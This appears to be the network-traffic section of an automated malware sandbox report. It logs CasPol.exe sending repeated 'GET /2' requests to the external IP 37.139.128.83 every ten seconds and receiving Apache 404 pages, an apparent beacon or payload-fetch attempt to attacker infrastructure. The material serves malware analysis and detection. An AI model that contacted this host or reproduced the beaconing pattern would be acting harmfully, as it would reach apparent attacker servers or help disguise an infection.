                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:23:21.510406017 CET | 498 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:23:21.510452032 CET | 499 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:23:21.510493040 CET | 499 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:23:21.510539055 CET | 499 | IN | Data Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    4 | 192.168.11.20 | 49801 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:17:27.240505934 CET | 190 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:17:27.319519997 CET | 191 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:17:27 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:17:27.319586039 CET | 191 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:17:27.336045980 CET192INData Raw: 35 63 0d 0a 0d 0a 0d 0a 20 20 20 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 0d 0a 20 20 20 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:17:27.336110115 CET192INData Raw: 31 34 0d 0a 0d 0a 3c 2f 70 3e 0d 0a 0d 0a 3c 68 32 3e 45 72 72 6f 72 20 0d 0a 32 33 0d 0a 34 30 34 3c 2f 68 32 3e 0d 0a 3c 61 64 64 72 65 73 73 3e 0d 0a 20 20 3c 61 20 68 72 65 66 3d 22 2f 22 3e 0d 0a 32 31 0d 0a 33 37 2e 31 33 39 2e 31 32 38 2e
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:17:27.336155891 CET192INData Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    40 | 192.168.11.20 | 49867 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:23:31.535437107 CET | 524 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:23:31.623294115 CET | 525 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:23:31 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:23:31.623338938 CET | 525 | IN | Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:23:31.623369932 CET | 526 | IN | Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:23:31.623399019 CET | 526 | IN | Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:23:31.623429060 CET | 526 | IN | Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    41 | 192.168.11.20 | 49868 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:23:41.658135891 CET | 527 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:23:41.731969118 CET | 527 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:23:41 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:23:41.732053041 CET | 528 | IN | Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:23:41.744688988 CET | 528 | IN | Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:23:41.744771004 CET | 528 | IN | Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:23:41.744826078 CET | 528 | IN | Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    42 | 192.168.11.20 | 49869 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:23:51.781950951 CET | 529 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:23:51.810120106 CET | 530 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:23:51 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:23:51.810159922 CET | 530 | IN | Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:23:51.810324907 CET | 530 | IN | Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:23:51.810340881 CET | 531 | IN | Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:23:51.810353994 CET | 531 | IN | Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    43 | 192.168.11.20 | 49872 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:24:01.843806982 CET | 556 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:24:01.929733038 CET | 557 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:24:01 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:24:01.929783106 CET | 557 | IN | Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:24:01.929805994 CET | 558 | IN | Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:24:01.929902077 CET | 558 | IN | Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:24:01.929923058 CET | 558 | IN | Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    44 | 192.168.11.20 | 49873 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:24:11.964451075 CET | 559 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:24:12.030263901 CET | 559 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:24:11 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:24:12.030352116 CET | 560 | IN | Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:24:12.030412912 CET | 560 | IN | Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:24:12.030468941 CET | 560 | IN | Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:24:12.030525923 CET | 560 | IN | Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    45 | 192.168.11.20 | 49874 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:24:22.055651903 CET | 561 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:24:22.127638102 CET | 562 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:24:22 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:24:22.127703905 CET | 562 | IN | Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:24:22.127751112 CET | 562 | IN | Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:24:22.127794027 CET | 563 | IN | Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:24:22.127840042 CET | 563 | IN | Data Ascii: 0


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    5192.168.11.204980437.139.128.8380C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    TimestampkBytes transferredDirectionData
                                                    Mar 20, 2023 13:17:37.362966061 CET207OUTGET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:17:37.437429905 CET207INHTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:17:37 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Raw: 63 62 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 0d 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 0d 0a 65 0d 0a 65 6e 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 0d 0a 31 35 0d 0a 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:17:37.437498093 CET208INData Raw: 0d 0a 33 39 0d 0a 4f 62 6a 65 63 74 20 6e 6f 74 20 66 6f 75 6e 64 21 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 76 3d 22 6d 61 64 65 22 20 68 72 65 66 3d 22 6d 61 69 6c 74 6f 3a 0d 0a 31 31 37 0d 0a 70 6f 73 74 6d 61 73 74 65 72 40 6c
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:17:37.437544107 CET | 208 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:17:37.437587023 CET | 208 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:17:37.437632084 CET | 208 | IN | Data Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    6 | 192.168.11.20 | 49805 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:17:47.469768047 CET | 209 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:17:47.492672920 CET | 210 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:17:47 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:17:47.492774963 CET | 210 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:17:47.492829084 CET | 211 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:17:47.492837906 CET | 211 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:17:47.492846966 CET | 211 | IN | Data Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    7 | 192.168.11.20 | 49806 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:17:57.530489922 CET | 212 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:17:57.574198008 CET | 213 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:17:57 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:17:57.574271917 CET | 213 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:17:57.574321985 CET | 213 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:17:57.574364901 CET | 214 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:17:57.574408054 CET | 214 | IN | Data Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    8 | 192.168.11.20 | 49810 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:18:07.608877897 CET | 228 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:18:07.643163919 CET | 229 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:18:07 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:18:07.643179893 CET | 229 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:18:07.643299103 CET | 229 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:18:07.643312931 CET | 229 | IN | Data Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0
                                                    Mar 20, 2023 13:18:08.001169920 CET | 230 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    9 | 192.168.11.20 | 49811 | 37.139.128.83 | 80 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    Mar 20, 2023 13:18:18.028491020 CET | 231 | OUT | GET /2 HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                    Host: 37.139.128.83
                                                    Cache-Control: no-cache
                                                    Mar 20, 2023 13:18:18.062808990 CET | 232 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 20 Mar 2023 12:18:17 GMT
                                                    Server: Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33
                                                    Vary: accept-language,accept-charset
                                                    Accept-Ranges: bytes
                                                    Transfer-Encoding: chunked
                                                    Content-Type: text/html; charset=utf-8
                                                    Content-Language: en
                                                    Data Ascii: cb<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" lang="een" xml:lang="15en"><head><title>
                                                    Mar 20, 2023 13:18:18.062891960 CET | 232 | IN
                                                    Data Ascii: 39Object not found!</title><link rev="made" href="mailto:117postmaster@localhost" /><style type="text/css">.../*--><![CDATA[/*>...*/ body { color: #000000; background-color: #FFFFFF; } a:link { color: #0000CC; } p
                                                    Mar 20, 2023 13:18:18.062947989 CET | 232 | IN
                                                    Data Ascii: 5c If you entered the URL manually please check your spelling and try again. 4b</p><p>49If you think this is a server error, please contactthe <a href="mailto:26postmaster@localhost">webmaster</a>.
                                                    Mar 20, 2023 13:18:18.062997103 CET | 233 | IN
                                                    Data Ascii: 14</p><h2>Error 23404</h2><address> <a href="/">2137.139.128.83</a><br /> <span>56Apache/2.4.41 (Win64) OpenSSL/1.0.2s PHP/7.1.33</span></address></body></html>2
                                                    Mar 20, 2023 13:18:18.063051939 CET | 233 | IN | Data Raw: 0d 0a 0d 0a 30 0d 0a 0d 0a
                                                    Data Ascii: 0


                                                    Target ID:2
